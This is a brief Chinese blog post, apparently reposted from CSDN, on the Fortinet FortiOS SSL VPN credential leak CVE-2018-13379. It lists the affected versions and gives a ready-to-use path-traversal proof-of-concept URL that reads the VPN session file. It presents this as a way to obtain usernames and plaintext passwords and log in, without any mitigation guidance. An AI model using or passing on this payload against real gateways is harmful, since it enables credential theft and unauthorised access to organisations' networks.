飞塔vpn账号密码泄露(CVE-2018-13379)
作者:互联网
影响版本
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 under SSL VPN web portal
利用CVE-2018-13379来泄露会话文件。这个session文件中包含一些有价值的信息,比如用户名以及明文密码,这样我们就可以轻松登录。
poc
https://x.x.x.x/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession
这里我们需要猜一下哪个是用户名和密码
标签:5.4,5.6,..,飞塔,2018,6.0,CVE 来源: https://blog.csdn.net/qq_44159028/article/details/114593863